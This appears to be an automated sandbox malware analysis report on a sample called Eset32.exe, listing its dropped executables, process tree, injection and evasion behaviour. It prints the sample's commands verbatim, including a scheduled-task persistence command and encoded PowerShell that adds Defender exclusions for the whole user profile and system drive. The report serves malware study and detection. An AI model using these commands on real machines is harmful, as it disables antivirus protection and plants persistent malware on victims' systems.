Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
Source: C:\Users\user\Desktop\Eset32.exe	Process created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exe	Jump to behavior
Source: C:\Users\user\Desktop\Eset32.exe	Process created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\12.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Source: C:\Users\user\AppData\Roaming\12.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%bqqlraak%'

Source: C:\Users\user\AppData\Roaming\12.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01

Source: 4.3.1.exe.2610000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.AppLaunch.exe.400000.0.unpack, u000fu2001.cs	Cryptographic APIs: 'CreateDecryptor'
Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 4.3.1.exe.2610000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B6905 pushad ; ret	10_2_00007FF9F09B6909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B6ABB push ebx; ret	10_2_00007FF9F09B6ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B6FFB pushad ; ret	10_2_00007FF9F09B702A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF9F09B4FFD push eax; iretd	10_2_00007FF9F09B50A1

Source: 1.exe.0.dr	Static PE information: section name: .QDwHSV
Source: 1.exe.0.dr	Static PE information: section name: .5{mr

Source: sihost64.exe.26.dr, tbydbmombqjohqmyfjzgtsxmneyqjriqdnvyvzl.cs	High entropy of concatenated method names: 'Main', 'uvoheezyq', 'ddtorxeqzaqxgbwo', 'vuxehejqeitboxwk', 'qxysbnhiviczdhccctzcmvprhcasrtobbs', '.ctor', '.cctor', 'X2ITMCRetNaZuIEaVu', 'jfBHNMAwpHEwauCEtA', 'bJtNW7nClCFlOQmmHt'
Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs	High entropy of concatenated method names: '.cctor', 'Ko4fgi8Si2i54', 'nX3eSP3Yx', 'wQ3NoJxUC', 'BBw0ksC92', 'ITsU20Evp', 'fEMwQFcLn', 'w3Hv3hVNF', 'V5sSwtoHa', 'SjY8mSGyH'

Source: C:\Users\user\Desktop\Eset32.exe	File created: C:\Users\user\AppData\Roaming\12.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\12.exe	File created: C:\Users\user\AppData\Roaming\Windows\System.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	File created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Eset32.exe	File created: C:\Users\user\AppData\Roaming\1.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320	Thread sleep count: 72 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 6356 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 2496 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452	Thread sleep count: 4225 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452	Thread sleep count: 442 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936	Thread sleep count: 75 > 30
Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936	Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804	Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804	Thread sleep time: -56000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 4456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828	Thread sleep count: 6186 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828	Thread sleep count: 391 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776	Thread sleep count: 4883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776	Thread sleep count: 960 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068	Thread sleep count: 4198 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236	Thread sleep count: 686 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6356	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4225	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 442	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6186
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 391
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4198
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 686

Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware2M_HP1AAWin32_VideoController62BPM7R8VideoController120060621000000.000000-000.8107733display.infMSBDA27EW32_9PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBZC63ZLH
Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: AppLaunch.exe, 00000006.00000002.707420720.0000000004EC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\12.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4A88008			Jump to behavior

Source: 4.3.1.exe.2610000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs	Reference to suspicious API methods: ('r9AVsVBWr', 'GetProcAddress@kernel32'), ('X0UhT8pIC', 'LoadLibrary@kernel32')

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force

Windows Analysis Report Eset32.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Eset32.exe

Source: C:\Users\user\AppData\Roaming\12.exe	Queries volume information: C:\Users\user\AppData\Roaming\12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\12.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
